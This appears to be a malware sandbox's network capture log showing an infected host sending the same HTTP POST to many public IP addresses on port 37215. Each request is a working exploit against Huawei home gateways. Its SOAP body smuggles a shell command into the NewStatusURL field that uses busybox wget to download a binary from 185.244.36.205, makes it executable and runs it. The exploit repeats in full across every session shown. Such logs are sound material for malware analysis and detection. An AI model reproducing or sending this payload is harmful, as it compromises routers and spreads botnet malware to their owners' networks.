                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1237192.168.2.154675237.45.88.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396719933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1238192.168.2.1532904102.52.105.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396754026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1239192.168.2.1534652122.63.17.17137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396755934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1240192.168.2.1539112121.122.185.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396811008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1241192.168.2.1539954156.213.254.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396820068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1242192.168.2.1545960122.43.107.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396831036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1243192.168.2.153615431.42.139.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396858931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1244192.168.2.155414641.43.48.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396871090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1245192.168.2.153665445.154.125.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396893978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1246192.168.2.1543006181.225.127.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396909952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1247192.168.2.1558504138.112.165.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396933079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
